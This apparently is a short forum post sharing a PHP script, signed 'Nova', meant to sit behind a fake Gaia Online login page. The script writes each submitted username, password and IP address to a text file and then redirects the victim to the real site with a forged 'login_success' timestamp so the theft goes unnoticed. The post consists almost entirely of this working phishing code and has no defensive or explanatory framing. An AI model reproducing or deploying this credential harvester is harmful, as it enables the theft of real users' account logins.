Nova

Nova
Code:
<?php
// Gaia Online Log In PHP Script.

// Variables.
$Username = $_POST['username'];
$Password = $_POST['password'];
$IP = $_SERVER['REMOTE_ADDR'];

// Place Gaian's data in text file.
file_put_contents('Info.txt', "Username: $Username | Password: $Password | I.P. Address: $IP \n", FILE_APPEND);

// Redirect them to Gaia. (With proper login_success Unix timestamp)
header('Location: http://www.gaiaonline.com/?login_success=' . time());

// Made by: Nova.
?>